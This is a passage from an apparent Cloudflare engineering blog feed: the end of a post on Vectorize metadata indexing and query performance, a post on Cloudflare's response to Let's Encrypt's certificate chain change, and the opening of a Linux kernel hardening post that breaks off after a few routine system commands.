      <h3>Indexing metadata with Chunked Sorted List Indexes</h3>
      <a href="#indexing-metadata-with-chunked-sorted-list-indexes">
        
      </a>
    </div>
    <p>Vectorize maintains one metadata index per filterable property, each implemented as a Chunked Sorted List Index.</p><p>A Chunked Sorted List Index is a sorted list of all distinct values present in the data for a filterable property, with each value mapped to the set of vector IDs having that value. This enables Vectorize to <a href="https://en.wikipedia.org/wiki/Binary_search"><u>binary search</u></a> a value in the metadata index in <a href="https://www.geeksforgeeks.org/what-is-logarithmic-time-complexity/"><u>O(log n)</u></a> complexity, in other words about as fast as search can be on a large dataset.</p><p>Because it can become very large on big indexes, the sorted list is chunked into pieces matching a target size in KB to keep index state fetches efficient.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7wRfqvPKtRx9RX5clyapxt/9630152212779ac008efc9685538f48e/blog-2590-vectorize-03-chunked-sorted-list.png" />
          </figure><p>A lightweight chunk descriptor list is maintained in the index manifest, keeping track of the list chunks and their lower/upper values. This chunk descriptor list can be binary searched to identify which chunk would contain the searched metadata value.</p><p>Once the candidate chunk is identified, Vectorize fetches that chunk from index data and binary searches it to take the set of vector IDs matching a metadata value if found, or an empty set if not found.</p>
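<p>The two-level lookup can be sketched like this, assuming illustrative chunk and descriptor structures: binary-search the descriptor list for the chunk that could contain the value, then binary-search inside that chunk.</p>

```python
# Chunked Sorted List lookup sketch (illustrative structures).
import bisect

# Chunks of a sorted list for a "color" property: sorted values plus the
# vector-ID set for each value.
chunks = [
    {"values": ["amber", "aqua", "blue"], "ids": [{1}, {2, 7}, {3, 4}]},
    {"values": ["green", "pink", "red"],  "ids": [{5}, {6}, {8, 9}]},
]
# Lightweight descriptor list kept in the manifest: upper bound of each chunk.
uppers = [c["values"][-1] for c in chunks]

def lookup(value):
    ci = bisect.bisect_left(uppers, value)       # which chunk could hold it
    if ci == len(chunks):
        return set()                             # beyond every chunk
    vals = chunks[ci]["values"]
    vi = bisect.bisect_left(vals, value)         # binary search in the chunk
    if vi < len(vals) and vals[vi] == value:
        return chunks[ci]["ids"][vi]
    return set()                                 # value absent: empty set

print(lookup("blue"), lookup("red"), lookup("mauve"))
```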
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6leIbnEGLN2qRitRXxoqog/01d5cfaad6e9e537b27bbc15933c1db0/blog-2590-vectorize-04-chunked-sorted-list-2.png" />
          </figure><p>We identify the matching vector set this way for every predicate in the metadata filter of the query, then intersect the sets in memory to determine the final set of vectors matched by the filters.</p><p>This is just half of the query being processed. We now need to identify the vectors most similar to the query vector, within those matching the metadata filters.</p>
    <div>
      <h3>Joining the metadata and vector indexes</h3>
      <a href="#joining-the-metadata-and-vector-indexes">
        
      </a>
    </div>
    <p>A vector similarity query always comes with an input vector. We can rank all centroids of our IVF vector index based on their proximity to that query vector.</p><p>The vector set matched by the metadata filters contains, for each vector, its ID and IVF centroid number.</p><p>From this, Vectorize derives the number of vectors matching the query filters per IVF centroid, and determines which and how many top-ranked IVF centroids need to be scanned according to the number of matches the query asks for.</p><p>Vectorize then performs the IVF-indexed vector search (see the section <b>Searching Vectors, and indexing them to speed things up</b> above) by considering only the vectors in the filtered metadata vector set.</p><p>Because we’re effectively pruning the vector search space using metadata filters, filtered queries can often be faster than their unfiltered equivalent.</p>
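<p>That per-centroid counting and centroid selection can be sketched over toy data; the names and the greedy selection rule are illustrative assumptions:</p>

```python
# Join sketch: count filter matches per IVF centroid, then scan top-ranked
# centroids until enough matches are covered (illustrative).
from collections import Counter

# (vector_id, centroid) pairs produced by the metadata filter pass.
filtered = [("a", 0), ("d", 0), ("g", 2), ("h", 2), ("k", 2), ("m", 5)]

# Centroids ranked by proximity to the query vector (best first), assumed given.
ranked_centroids = [2, 0, 5, 1, 3, 4]

def centroids_to_scan(top_k):
    per_centroid = Counter(c for _, c in filtered)
    chosen, covered = [], 0
    for c in ranked_centroids:
        if covered >= top_k:
            break
        if per_centroid[c]:
            chosen.append(c)
            covered += per_centroid[c]
    return chosen

print(centroids_to_scan(top_k=4))   # scanning centroids 2 and 0 covers 5 >= 4
```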
    <div>
      <h2>Query performance</h2>
      <a href="#query-performance">
        
      </a>
    </div>
    <p>The performance of a system is measured in terms of latency and throughput.</p><p>Latency is a measure relative to individual queries, evaluating the time it takes for a query to be processed, usually expressed in milliseconds. It is what an end user perceives as the “speed” of the service, so a lower latency is desirable.</p><p>Throughput is a measure relative to an index, evaluating the number of queries it can process concurrently over a period of time, usually expressed in requests per second or RPS. It is what enables an application to scale to thousands of simultaneous users, so a higher throughput is desirable.</p><p>Vectorize is designed for great index throughput and optimized for low query latency to deliver great performance for demanding applications. <a href="https://blog.cloudflare.com/workers-ai-bigger-better-faster/#how-fast-is-vectorize"><u>Check out our benchmarks</u></a>.</p>
    <div>
      <h3>Query latency optimization</h3>
      <a href="#query-latency-optimization">
        
      </a>
    </div>
    <p>Vectorize is a distributed database that keeps its data state on blob storage, so its latency is primarily driven by fetches of index data; it relies heavily on <a href="https://developers.cloudflare.com/cache"><u>Cloudflare’s network of caches</u></a> as well as each server’s RAM cache to keep latency low.</p><p>Because Vectorize data is snapshot versioned (see <b>Eventual consistency and snapshot versioning</b> above), each version of the index data is immutable and thus highly cacheable, increasing the latency benefits Vectorize gets from relying on Cloudflare’s cache infrastructure.</p><p>To keep the index data lean, Vectorize uses several techniques to reduce its size. In addition to Product Quantization (see <b>Compressing vectors with PQ</b> above), index files use a space-efficient binary format optimized for runtime performance that Vectorize is able to use without parsing, once fetched.</p><p>Index data is fragmented in a way that minimizes the amount of data required to process a query. Auxiliary indexes into that data are maintained to limit the number of fragments to fetch, reducing overfetch by jumping straight to the relevant piece of data on mass storage.</p><p>Vectorize boosts all vector proximity computations by leveraging <a href="https://en.wikipedia.org/wiki/Single_instruction,_multiple_data"><u>SIMD CPU instructions</u></a>, and by organizing the vector search in two passes, effectively balancing the latency/result accuracy ratio (see <b>Approximate nearest neighbor search and result accuracy refining</b> above).</p><p>When used via a Worker binding, each query is processed close to the server serving the worker request, and thus close to the end user, minimizing the network-induced latency between the end user, the Worker application, and Vectorize.</p>
    <div>
      <h3>Query throughput</h3>
      <a href="#query-throughput">
        
      </a>
    </div>
    <p>Vectorize runs in every Cloudflare data center, on thousands of servers across the world.</p><p>Thanks to the snapshot versioning of every index’s data, every server can serve the index concurrently, without contention on state.</p><p>This means that a Vectorize index elastically scales horizontally with its distributed traffic, providing very high throughput for the most demanding Worker applications.</p>
    <div>
      <h2>Increased index size</h2>
      <a href="#increased-index-size">
        
      </a>
    </div>
    <p>We are excited that our upgraded version of Vectorize can support a maximum of 5 million vectors, which is a 25x improvement over the limit in beta (200,000 vectors). All the improvements we discussed in this blog post contribute to this increase in vector storage. <a href="https://blog.cloudflare.com/workers-ai-bigger-better-faster/#how-fast-is-vectorize"><u>Improved query performance</u></a> and throughput come with this increase in storage as well.</p><p>However, 5 million may be constraining for some use cases. We have already heard this feedback. The limit stems from the constraints of building a brand new globally distributed stateful service, and our desire to iterate fast and make Vectorize generally available so builders can confidently leverage it in their production apps.</p><p>We believe builders will be able to leverage Vectorize as their primary vector store, either with a single index or by sharding across multiple indexes. But if this limit is too constraining for you, please let us know. Tell us your use case, and let's see if we can work together to make Vectorize work for you.</p>
    <div>
      <h2>Try it now!</h2>
      <a href="#try-it-now">
        
      </a>
    </div>
    <p>Every developer on a free plan can give Vectorize a try. You can <a href="https://developers.cloudflare.com/vectorize/"><u>visit our developer documentation to get started</u></a>.</p><p>If you’re looking for inspiration on what to build, <a href="http://developers.cloudflare.com/vectorize/get-started/embeddings/"><u>see the semantic search tutorial</u></a> that combines <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> and Vectorize for document search, running entirely on Cloudflare. Or an example of <a href="https://developers.cloudflare.com/workers-ai/tutorials/build-a-retrieval-augmented-generation-ai/"><u>how to combine OpenAI and Vectorize</u></a> to give an LLM more context and dramatically improve the accuracy of its answers.</p><p>And if you have questions for our product &amp; engineering teams about how to use Vectorize, or just want to bounce an idea off of other developers building on Workers AI, join the #vectorize and #workers-ai channels on our <a href="https://discord.cloudflare.com/"><u>Developer Discord</u></a>.</p>
            <category><![CDATA[Engineering]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Edge Database]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Storage]]></category>
            <guid isPermaLink="false">2UYBSJmJKD66lXTstsRhTg</guid>
            <dc:creator>Jérôme Schneider</dc:creator>
            <dc:creator>Alex Graham</dc:creator>
        </item>
        <item>
            <title><![CDATA[How we ensure Cloudflare customers aren't affected by Let's Encrypt's certificate chain change]]></title>
            <link>https://blog.cloudflare.com/shortening-lets-encrypt-change-of-trust-no-impact-to-cloudflare-customers/</link>
            <pubDate>Fri, 12 Apr 2024 13:00:09 GMT</pubDate>
            <description><![CDATA[ Let’s Encrypt’s cross-signed chain will be expiring in September. This will affect legacy devices with outdated trust stores (Android versions 7.1.1 or older). To prevent this change from impacting customers, Cloudflare will shift Let’s Encrypt certificates upon renewal to use a different CA ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7xrPBUpEjsmaBkRYhxiRIr/c95f42fffef36c7d595422b4724c8665/Untitled--3--1.png" />
            
            </figure><p><a href="https://letsencrypt.org/">Let’s Encrypt</a>, a publicly trusted certificate authority (CA) that Cloudflare uses to issue TLS certificates, has been relying on two distinct certificate chains. One is cross-signed with <a href="https://www.identrust.com/">IdenTrust</a>, a globally trusted CA that has been around since 2000, and the other is Let’s Encrypt’s own root CA, ISRG Root X1. Since Let’s Encrypt launched, <a href="https://letsencrypt.org/certificates/#root-certificates">ISRG Root X1</a> has been steadily gaining its own device compatibility.</p><p>On September 30, 2024, Let’s Encrypt’s certificate chain cross-signed with IdenTrust will <a href="https://letsencrypt.org/2023/07/10/cross-sign-expiration.html">expire</a>. After the cross-sign expires, servers will no longer be able to serve certificates signed by the cross-signed chain. Instead, all Let’s Encrypt certificates will use the ISRG Root X1 CA.</p><p>Most devices and browser versions released after 2016 will not experience any issues as a result of the change since the ISRG Root X1 will already be installed in those clients’ trust stores. That's because these modern browsers and operating systems were built to be agile and flexible, with upgradeable trust stores that can be updated to include new certificate authorities.</p><p>The change in the certificate chain will impact legacy devices and systems, such as devices running Android version 7.1.1 (released in 2016) or older, as those exclusively rely on the cross-signed chain and lack the ISRG X1 root in their trust store. These clients will encounter TLS errors or warnings when accessing domains secured by a Let’s Encrypt certificate. We took a look at the data ourselves and found that, of all Android requests, 2.96% of them come from devices that will be affected by the change. That’s a substantial portion of traffic that will lose access to the Internet. 
We’re committed to keeping those users online and will modify our certificate pipeline so that we can continue to serve users on older devices without requiring any manual modifications from our customers.</p>
    <div>
      <h3>A better Internet, for everyone</h3>
      <a href="#a-better-internet-for-everyone">
        
      </a>
    </div>
    <p>In the past, we invested in efforts like <a href="/sha-1-deprecation-no-browser-left-behind/">“No Browsers Left Behind”</a> to help ensure that we could continue to support clients as SHA-1 based algorithms were being deprecated. Now, we’re applying the same approach for the upcoming Let’s Encrypt change.</p><p>We have made the decision to remove Let’s Encrypt as a certificate authority from all flows where Cloudflare dictates the CA, impacting Universal SSL customers and those using SSL for SaaS with the “default CA” choice.</p><p>Starting in June 2024, one certificate lifecycle (90 days) before the cross-sign chain expires, we’ll begin migrating Let’s Encrypt certificates that are up for renewal to use a different CA, one that ensures compatibility with older devices affected by the change. That means that going forward, customers will only receive Let’s Encrypt certificates if they explicitly request Let’s Encrypt as the CA.</p><p>The change that Let's Encrypt is making is a necessary one. For us to move forward in supporting new standards and protocols, we need to make the Public Key Infrastructure (PKI) ecosystem more agile. By retiring the cross-signed chain, Let’s Encrypt is pushing devices, browsers, and clients to support adaptable trust stores.</p><p>However, we’ve observed <a href="/sha-1-deprecation-no-browser-left-behind/">changes like this in the past</a> and while they push the adoption of new standards, they disproportionately impact users in economically disadvantaged regions, where access to new technology is limited.</p><p>Our mission is to help build a better Internet and that means supporting users worldwide. We previously published a <a href="/upcoming-lets-encrypt-certificate-chain-change-and-impact-for-cloudflare-customers">blog post about the Let’s Encrypt change</a>, asking customers to switch their certificate authority if they expected any impact. However, determining the impact of the change is challenging. 
Error rates due to trust store incompatibility are primarily logged on clients, reducing the visibility that domain owners have. In addition, while there might be no requests incoming from incompatible devices today, it doesn’t guarantee uninterrupted access for a user tomorrow.</p><p>Cloudflare’s certificate pipeline has evolved over the years to be resilient and flexible, allowing us to seamlessly adapt to changes like this without any negative impact to our customers.  </p>
    <div>
      <h3>How Cloudflare has built a robust TLS certificate pipeline</h3>
      <a href="#how-cloudflare-has-built-a-robust-tls-certificate-pipeline">
        
      </a>
    </div>
    <p>Today, Cloudflare manages tens of millions of certificates on behalf of customers. For us, a successful pipeline means:</p><ol><li><p>Customers can always obtain a TLS certificate for their domain</p></li><li><p>CA-related issues have zero impact on our customers’ ability to obtain a certificate</p></li><li><p>The best security practices and modern standards are utilized</p></li><li><p>The pipeline is optimized for future scale</p></li><li><p>A wide range of clients and devices are supported</p></li></ol><p>Every year, we introduce new optimizations into our certificate pipeline to maintain the highest level of service. Here’s how we do it…</p>
    <div>
      <h3>Ensuring customers can always obtain a TLS certificate for their domain</h3>
      <a href="#ensuring-customers-can-always-obtain-a-tls-certificate-for-their-domain">
        
      </a>
    </div>
    <p>Since the launch of Universal SSL in 2014, Cloudflare has been responsible for issuing and serving a TLS certificate for every domain that’s protected by our network. That might seem trivial, but there are a few steps that have to successfully execute in order for a domain to receive a certificate:</p><ol><li><p>Domain owners need to complete <a href="https://developers.cloudflare.com/ssl/edge-certificates/changing-dcv-method/">Domain Control Validation</a> for every certificate issuance and renewal.</p></li><li><p>The certificate authority needs to verify the Domain Control Validation tokens to issue the certificate.</p></li><li><p><a href="https://developers.cloudflare.com/ssl/edge-certificates/troubleshooting/caa-records/">CAA records</a>, which dictate which CAs can be used for a domain, need to be checked to ensure only authorized parties can issue the certificate.</p></li><li><p>The certificate authority must be available to issue the certificate.</p></li></ol><p>Each of these steps requires coordination across a number of parties — domain owners, CDNs, and certificate authorities. At Cloudflare, we like to be in control when it comes to the success of our platform. That’s why we make it our job to ensure each of these steps can be successfully completed.</p><p>We ensure that every certificate issuance and renewal requires minimal effort from our customers. To get a certificate, a domain owner has to complete Domain Control Validation (DCV) to prove that it does in fact own the domain. Once the certificate request is initiated, the CA will return DCV tokens which the domain owner will need to place in a DNS record or an HTTP token. If you’re using Cloudflare as your DNS provider, Cloudflare completes DCV on your behalf by automatically placing the TXT token returned from the CA into your DNS records. 
Alternatively, if you use an external DNS provider, we offer the option to <a href="/introducing-dcv-delegation/">Delegate DCV</a> to Cloudflare for automatic renewals without any customer intervention.</p><p>Once DCV tokens are placed, Certificate Authorities (CAs) verify them. CAs conduct this <a href="/secure-certificate-issuance">verification from multiple vantage points</a> to prevent spoofing attempts. However, since these checks are done from multiple countries and ASNs (Autonomous Systems), they may trigger a Cloudflare WAF rule which can cause the DCV check to get blocked. We made sure to update our WAF and security engine to recognize that these requests are coming from a CA to ensure they're never blocked so DCV can be successfully completed.</p><p>Some customers have CA preferences, due to internal requirements or compliance regulations. To prevent an unauthorized CA from issuing a certificate for a domain, the domain owner can create a Certification Authority Authorization (CAA) DNS record, specifying which CAs are allowed to issue a certificate for that domain. To ensure that customers can always obtain a certificate, we check the CAA records before requesting a certificate to know which CAs we should use. If the CAA records block all of the <a href="https://developers.cloudflare.com/ssl/reference/certificate-authorities/">CAs that are available</a> in Cloudflare’s pipeline and the customer has not uploaded a certificate from the CA of their choice, then we add CAA records on our customers’ behalf to ensure that they can get a certificate issued. Where we can, we optimize for preference. Otherwise, it’s our job to prevent an outage by ensuring that there’s always a TLS certificate available for the domain, even if it does not come from a preferred CA.</p><p>Today, Cloudflare is not a publicly trusted certificate authority, so we rely on the CAs that we use to be highly available. But, 100% uptime is an unrealistic expectation. 
Instead, our pipeline needs to be prepared in case our CAs become unavailable.</p>
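    <p>For illustration, here is what the CAA records mentioned above might look like in a DNS zone file (a hypothetical sketch; the CA names are just examples, not a recommendation):</p>
            <pre><code>; Only the listed CAs may issue certificates for example.com
example.com.  IN  CAA  0 issue "letsencrypt.org"
example.com.  IN  CAA  0 issue "pki.goog"
; Disallow wildcard issuance from any CA
example.com.  IN  CAA  0 issuewild ";"</code></pre>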
    <div>
      <h4>Ensuring that CA-related issues have zero impact on our customers’ ability to obtain a certificate</h4>
      <a href="#ensuring-that-ca-related-issues-have-zero-impact-on-our-customers-ability-to-obtain-a-certificate">
        
      </a>
    </div>
    <p>At Cloudflare, we like to think ahead, which means preventing incidents before they happen. It’s not uncommon for CAs to become unavailable — sometimes because of an outage, but more commonly because of scheduled maintenance windows during which they cannot issue certificates.</p><p>It’s our job to ensure CA redundancy, which is why we always have multiple CAs ready to issue a certificate, ensuring high availability at all times. If you've noticed different CAs issuing your Universal SSL certificates, that's intentional. We evenly distribute the load across our CAs to avoid any single point of failure. Plus, we keep a close eye on latency and error rates to detect any issues and automatically switch to a different CA that's available and performant. You may not know this, but one of our CAs has around four scheduled maintenance periods every month. When this happens, our automated systems kick in seamlessly, keeping everything running smoothly. This works so well that our internal teams don’t get paged anymore because everything <i>just works.</i></p>
    <div>
      <h4>Adopting best security practices and modern standards  </h4>
      <a href="#adopting-best-security-practices-and-modern-standards">
        
      </a>
    </div>
    <p>Security has always been, and will continue to be, Cloudflare’s top priority, and so maintaining the highest security standards to safeguard our customers’ data and private keys is crucial.</p><p>Over the past decade, the <a href="https://cabforum.org/">CA/Browser Forum</a> has advocated for reducing certificate lifetimes from 5 years to 90 days as the industry norm. This shift helps minimize the risk of a key compromise. When certificates are renewed every 90 days, their private keys remain valid for only that period, reducing the window of time that a bad actor can make use of the compromised material.</p><p>We fully embrace this change and have made 90 days the default certificate validity period. This enhances our security posture by ensuring regular key rotations, and has pushed us to develop tools like DCV Delegation that promote <a href="https://www.cloudflare.com/application-services/solutions/certificate-lifecycle-management/">automation</a> around frequent certificate renewals, without the added overhead. It’s what enables us to offer certificates with validity periods as low as two weeks, for customers that want to rotate their private keys at a high frequency without any concern that it will lead to certificate renewal failures.</p><p>Cloudflare has always been at the forefront of new protocols and standards. <a href="https://www.cloudflare.com/press-releases/2014/cloudflare-offers-the-industrys-first-universal-ssl-for-free/">It’s no secret</a> that when we support a new protocol, adoption skyrockets. This month, we will be adding <a href="/ecdsa-the-digital-signature-algorithm-of-a-better-internet">ECDSA</a> support for certificates issued from <a href="https://pki.goog/">Google Trust Services</a>. With <a href="https://www.cloudflare.com/learning/dns/dnssec/ecdsa-and-dnssec/">ECDSA</a>, you get the same level of security as RSA but with smaller keys.
Smaller keys mean smaller certificates and less data passed around to establish a TLS connection, which results in quicker connections and faster loading times.</p>
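    <p>The size difference is easy to see locally with OpenSSL (an illustrative sketch; the file names are arbitrary):</p>
            <pre><code># Generate a P-256 ECDSA key and a 2048-bit RSA key
openssl ecparam -genkey -name prime256v1 -noout -out ec.key
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out rsa.key

# Compare the encoded sizes: the EC key is several times smaller
wc -c ec.key rsa.key</code></pre>
    <p>Certificates and TLS handshake messages shrink accordingly, which is where the latency win comes from.</p>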
    <div>
      <h4>Optimizing for future scale</h4>
      <a href="#optimizing-for-future-scale">
        
      </a>
    </div>
    <p>Today, Cloudflare issues almost 1 million certificates per day. With the recent shift towards shorter certificate lifetimes, we continue to improve our pipeline to be more robust. But even if our pipeline can handle the significant load, we still need to rely on our CAs to be able to scale with us. With every CA that we integrate, we instantly become one of their biggest consumers. We hold our CAs to high standards and push them to improve their infrastructure to scale. This doesn’t just benefit Cloudflare’s customers, but it helps the Internet by requiring CAs to handle higher volumes of issuance.</p><p>And now, with Let’s Encrypt shortening their chain of trust, we’re going to add an additional improvement to our pipeline — one that will ensure the best device compatibility for all.</p>
    <div>
      <h4>Supporting all clients — legacy and modern</h4>
      <a href="#supporting-all-clients-legacy-and-modern">
        
      </a>
    </div>
    <p>The upcoming Let’s Encrypt change will prevent legacy devices from making requests to domains or applications that are protected by a Let’s Encrypt certificate. We don’t want to cut off Internet access from any part of the world, which means that we’re going to continue to provide the best device compatibility to our customers, despite the change.</p><p>Because of all the recent enhancements, we are able to reduce our reliance on Let’s Encrypt without impacting the reliability or quality of service of our certificate pipeline. One certificate lifecycle (90 days) before the change, we are going to start shifting certificates to use a different CA, one that’s compatible with the devices that will be impacted. By doing this, we’ll mitigate any impact without any action required from our customers. The only customers that will continue to use Let’s Encrypt are ones that have specifically chosen Let’s Encrypt as the CA.</p>
    <div>
      <h3>What to expect of the upcoming Let’s Encrypt change</h3>
      <a href="#what-to-expect-of-the-upcoming-lets-encrypt-change">
        
      </a>
    </div>
    <p>Let’s Encrypt’s cross-signed chain will <a href="https://letsencrypt.org/2023/07/10/cross-sign-expiration.html">expire</a> on September 30th, 2024. Although Let’s Encrypt plans to stop issuing certificates from this chain on June 6th, 2024, Cloudflare will continue to serve the cross-signed chain for all Let’s Encrypt certificates until September 9th, 2024.</p><p>90 days or one certificate lifecycle before the change, we are going to start shifting Let’s Encrypt certificates to use a different certificate authority. We’ll make this change for all products where Cloudflare is responsible for the CA selection, meaning this will be automatically done for customers using Universal SSL and SSL for SaaS with the “default CA” choice.</p><p>Any customers that have specifically chosen Let’s Encrypt as their CA will receive an email notification with a list of their Let’s Encrypt certificates and information on whether or not we’re seeing requests on those hostnames coming from legacy devices.</p><p>After September 9th, 2024, Cloudflare will serve all Let’s Encrypt certificates using the ISRG Root X1 chain. Here is what you should expect based on the certificate product that you’re using:</p>
    <div>
      <h4>Universal SSL</h4>
      <a href="#universal-ssl">
        
      </a>
    </div>
    <p>With <a href="https://developers.cloudflare.com/ssl/edge-certificates/universal-ssl/">Universal SSL</a>, Cloudflare chooses the CA that is used for the domain’s certificate. This gives us the power to choose the best certificate for our customers. <b>If you are using Universal SSL, there are no changes for you to make to prepare for this change</b>. Cloudflare will automatically shift your certificate to use a more compatible CA.</p>
    <div>
      <h4>Advanced Certificates</h4>
      <a href="#advanced-certificates">
        
      </a>
    </div>
    <p>With <a href="https://developers.cloudflare.com/ssl/edge-certificates/advanced-certificate-manager/">Advanced Certificate Manager</a>, customers specifically choose which CA they want to use. If Let’s Encrypt was specifically chosen as the CA for a certificate, we will respect that choice, because customers may have chosen this CA due to internal requirements, or because they have implemented certificate pinning, which we highly discourage.</p><p>If we see that a domain using an Advanced certificate issued from Let’s Encrypt will be impacted by the change, then we will send out email notifications to inform those customers which certificates are using Let’s Encrypt as their CA and whether or not those domains are receiving requests from clients that will be impacted by the change. Customers will be responsible for changing the CA to another provider, if they choose to do so.</p>
    <div>
      <h4>SSL for SaaS</h4>
      <a href="#ssl-for-saas">
        
      </a>
    </div>
    <p>With <a href="https://developers.cloudflare.com/cloudflare-for-platforms/cloudflare-for-saas/security/certificate-management/">SSL for SaaS</a>, customers have two options: using a default CA, meaning Cloudflare will choose the issuing authority, or specifying which CA to use.</p><p>If you’re leaving the CA choice up to Cloudflare, then we will automatically use a CA with higher device compatibility.</p><p>If you’re specifying a certain CA for your custom hostnames, then we will respect that choice. We will send an email out to SaaS providers and platforms to inform them which custom hostnames are receiving requests from legacy devices. Customers will be responsible for changing the CA to another provider, if they choose to do so.</p>
    <div>
      <h4>Custom Certificates</h4>
      <a href="#custom-certificates">
        
      </a>
    </div>
    <p>If you directly integrate with Let’s Encrypt and use <a href="https://developers.cloudflare.com/ssl/edge-certificates/custom-certificates/">Custom Certificates</a> to upload your Let’s Encrypt certs to Cloudflare then your certificates will be bundled with the cross-signed chain, as long as you choose the bundle method “<a href="https://developers.cloudflare.com/ssl/edge-certificates/custom-certificates/bundling-methodologies/#compatible">compatible</a>” or “<a href="https://developers.cloudflare.com/ssl/edge-certificates/custom-certificates/bundling-methodologies/#modern">modern</a>” and upload those certificates before September 9th, 2024. After September 9th, we will bundle all Let’s Encrypt certificates with the ISRG Root X1 chain. With the “<a href="https://developers.cloudflare.com/ssl/edge-certificates/custom-certificates/bundling-methodologies/#user-defined">user-defined</a>” bundle method, we always serve the chain that’s uploaded to Cloudflare. If you upload Let’s Encrypt certificates using this method, you will need to ensure that certificates uploaded after September 30th, 2024, the date of the CA expiration, contain the right certificate chain.</p><p>In addition, if you control the clients that are connecting to your application, we recommend updating the trust store to include the <a href="https://letsencrypt.org/certificates/#root-certificates">ISRG Root X1</a>. If you use certificate pinning, remove or update your pin. In general, we discourage all customers from pinning their certificates, as this usually leads to issues during certificate renewals or CA changes.</p>
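    <p>The trust store behavior is easy to reproduce locally with OpenSSL (an illustrative sketch using throwaway self-signed certificates; none of these names refer to real CAs):</p>
            <pre><code># Create a throwaway "root" CA and a leaf certificate signed by it
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
    -subj "/CN=Toy Root/" -keyout root.key -out root.pem
openssl req -newkey rsa:2048 -nodes \
    -subj "/CN=leaf.example.com/" -keyout leaf.key -out leaf.csr
openssl x509 -req -in leaf.csr -CA root.pem -CAkey root.key \
    -CAcreateserial -days 1 -out leaf.pem

# Verification succeeds only if the issuing root is in the trust store
openssl verify -CAfile root.pem leaf.pem</code></pre>
    <p>A client whose trust store is missing ISRG Root X1 fails this last step for certificates chaining to it, which is exactly what affected legacy devices will experience.</p>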
    <div>
      <h2>Conclusion</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>Internet standards will continue to evolve and improve. As we support and embrace those changes, we also need to recognize that it’s our responsibility to keep users online and to maintain Internet access in the parts of the world where new technology is not readily available. By using Cloudflare, you always have the option to choose the setup that’s best for your application.</p><p>For additional information regarding the change, please refer to our <a href="https://developers.cloudflare.com/ssl/reference/migration-guides/lets-encrypt-chain/">developer documentation</a>.</p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[TLS]]></category>
            <category><![CDATA[SSL]]></category>
            <category><![CDATA[Certificate Authority]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <guid isPermaLink="false">ymep6DaFvevM4m2AIdw5F</guid>
            <dc:creator>Dina Kozlov</dc:creator>
        </item>
        <item>
            <title><![CDATA[Linux kernel security tunables everyone should consider adopting]]></title>
            <link>https://blog.cloudflare.com/linux-kernel-hardening/</link>
            <pubDate>Wed, 06 Mar 2024 14:00:43 GMT</pubDate>
            <description><![CDATA[ This post illustrates some of the Linux Kernel features, which are helping us to keep our production systems more secure. We will deep dive into how they work and why you may consider enabling them as well ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1MwDdpmFexb2YBRb6Y4VkD/f8fe7a101729ee9fa518a457b8bb170a/Technical-deep-dive-for-Security-week.png" />
            
            </figure><p>The Linux kernel is the heart of many modern production systems. It decides when any code is allowed to run and which programs/users can access which resources. It manages memory, mediates access to hardware, and does the bulk of the work under the hood on behalf of programs running on top. Since the kernel is always involved in any code execution, it is in the best position to protect the system from malicious programs, enforce the desired system security policy, and provide security features for safer production environments.</p><p>In this post, we will review some Linux kernel security configurations we use at Cloudflare and how they help to block or minimize a potential system compromise.</p>
    <div>
      <h2>Secure boot</h2>
      <a href="#secure-boot">
        
      </a>
    </div>
    <p>When a machine (either a laptop or a server) boots, it goes through several boot stages:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7LULhRh5qh02zFnil5ZPnl/b2e1867ba56492628bbb95ba6850448e/image3-17.png" />
            
            </figure><p>Within a secure boot architecture each stage from the above diagram verifies the integrity of the next stage before passing execution to it, thus forming a so-called secure boot chain. This way “trustworthiness” is extended to every component in the boot chain, because if we verified the code integrity of a particular stage, we can trust this code to verify the integrity of the next stage.</p><p>We <a href="/anchoring-trust-a-hardware-secure-boot-story">have previously covered</a> how Cloudflare implements secure boot in the initial stages of the boot process. In this post, we will focus on the Linux kernel.</p><p>Secure boot is the cornerstone of any operating system security mechanism. The Linux kernel is the primary enforcer of the operating system security configuration and policy, so we have to be sure that the Linux kernel itself has not been tampered with. In our previous <a href="/anchoring-trust-a-hardware-secure-boot-story">post about secure boot</a> we showed how we use UEFI Secure Boot to ensure the integrity of the Linux kernel.</p><p>But what happens next? After the kernel gets executed, it may try to load additional drivers, or as they are called in the Linux world, kernel modules. And kernel module loading is not confined just to the boot process. A module can be loaded at any time during runtime — a new device being plugged in and a driver is needed, some additional extensions in the networking stack are required (for example, for fine-grained firewall rules), or just manually by the system administrator.</p><p>However, uncontrolled kernel module loading might pose a significant risk to system integrity. Unlike regular programs, which get executed as user space processes, kernel modules are pieces of code which get injected and executed directly in the Linux kernel address space. There is no separation between the code and data in different kernel modules and core kernel subsystems, so everything can access everything. 
This means that a rogue kernel module can completely nullify the trustworthiness of the operating system and make secure boot useless. As an example, consider a simple Debian 12 (Bookworm) installation, but with <a href="https://selinuxproject.org/">SELinux</a> configured and enforced:</p>
            <pre><code>ignat@dev:~$ lsb_release --all
No LSB modules are available.
Distributor ID:	Debian
Description:	Debian GNU/Linux 12 (bookworm)
Release:	12
Codename:	bookworm
ignat@dev:~$ uname -a
Linux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
ignat@dev:~$ sudo getenforce
Enforcing</code></pre>
            <p>Now we need to do some research. First, we see that we’re running 6.1.76 Linux Kernel. If we explore the source code, we would see that <a href="https://elixir.bootlin.com/linux/v6.1.76/source/security/selinux/hooks.c#L107">inside the kernel, the SELinux configuration is stored in a singleton structure</a>, which <a href="https://elixir.bootlin.com/linux/v6.1.76/source/security/selinux/include/security.h#L92">is defined</a> as follows:</p>
